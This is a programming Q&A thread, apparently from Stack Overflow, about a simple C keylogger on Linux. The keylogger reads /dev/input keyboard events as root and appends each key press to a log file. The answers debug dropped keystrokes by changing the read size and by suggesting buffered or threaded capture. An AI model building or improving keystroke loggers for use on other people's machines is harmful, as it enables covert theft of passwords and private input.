# Reading events from the keyboard device and storing it in a file skips some input

Tags: c, optimization, keyboard-events, keylogger

I am writing a code for a very simple keylogger. It reads input from the `/dev/input/event[0..9]` and uses the `read()` system call to read the inputs done by the keyboard. This input is then redirected to be stored in a log file.

The code is below.

```
struct input_event ev[64];
int fd, rd, value, i, size = sizeof (struct input_event);
char dev_id[32];
char device[64];
FILE *f = fopen("/home/student/junk/haris/key_log.txt", "a");

FILE* fpp = popen("grep -E 'Handlers|EV=' /proc/bus/input/devices | grep -B1 'EV=120013' | grep -Eo 'event[0-9]+'", "r");
fgets(dev_id, sizeof(dev_id), fpp);
sprintf(device,"/dev/input/%s",dev_id);

for(i=0; device[i] != '\n'; i++)
    ;
device[i] = '\0';

if ((getuid ()) != 0)
    printf ("You are not root! This may not work...n");


if ((fd = open (device, O_RDONLY)) == -1)
    printf ("%s is not a valid device.n", device);

size *= 64;

while (1)
{
    if ((rd = read(fd, ev, size)) < size)
        exit(0); 

    if (ev[1].value == 1 && ev[1].type == 1) // Only read the key press event
    {
        fflush(f);
        fprintf(f, "%s", key_map[(ev[1].code)]);
    }
}
```

The last `while` loop is the main loop where the read happens. **Everything is working fine**.

---

**The Problem that i am facing** is when some user types any word too fast, the program is not able to pick up the event of all the key presses. It misses out on some letter when the words are typed too fast.

For instance, if i type the word `hello haris` very fast in my keyboard, the output in the log file will be `hllo hars`.

*I think this error is happening because the loop is taking time to iterate. Before one event can be read and written to the file, the next event is taking place and getting over.*

Is there any way to optimize the code to not miss any of the events. Or is there any other reason for this.

---

**Bonus question**

*The terminal and other devices are able to pick up all the inputs no matter however fast i type, why is that?*

Comment: Have you tried not to do fflush() every time there is a input?  File I/O involve storage device usually are the bottleneck.

Comment: @SSC, ya but then the buffer won't be written to the file untill the `file descriptor` closes.  What if i want to read the file of the latest key presses.

Comment: Do you check, that this is a real problem? For example count events, and write to file counter, instead of events, and write counter every 10 events, for example, does count of events match what you expect?

Comment: @user1034749, i didn't get exactly what you are trying to say. But, i have tested it with inputs, it works properly, if the input is not typed fast.

Answer (score 1, accepted):

The problem was in the size of the `read()`

```
(rd = read(fd, ev, size);
```

Where,

```
struct input_event ev[64];

size = sizeof (struct input_event) * 64;
```

Thats a big size for the `read()` function.

While I was debugging I found out that to get the keystroke, only a single variable (and not an array) of `struct input_event` is enough.

So i change the following things,

```
struct input_event ev;
.
.
size = sizeof (struct input_event);
.
.
(rd = read(fd, ev, size);
```

And it is reading all the keystrokes without missing anyone of them.

Answer (score 2):

There are many ways to achieve what you want:

1) the simple one use select + read + caching, pseudo code:

```
result = select();
if (result == TIMEOUT)
  flush_input_queue_to_file();
else (result == DATA_READY)
  add_event_to_queue();
```

So you need to add https://en.wikipedia.org/wiki/Circular_buffer to your code
and select before read.
Because of you will have one I/O per many input events, intsead of one event = one write to file, this reduce probability to lost some events.

2)Use two thread and queue with mutex, one thread write to file, and it may block to I/O, other thread read input and put event to queue, read about pthread to achieve this. You can also increase priority of reading input thread in compare with writing logs thread, plus use lock free queue.

Comment: Thanx for the solution, i tried this also. But it didn't work. Then i found the problem.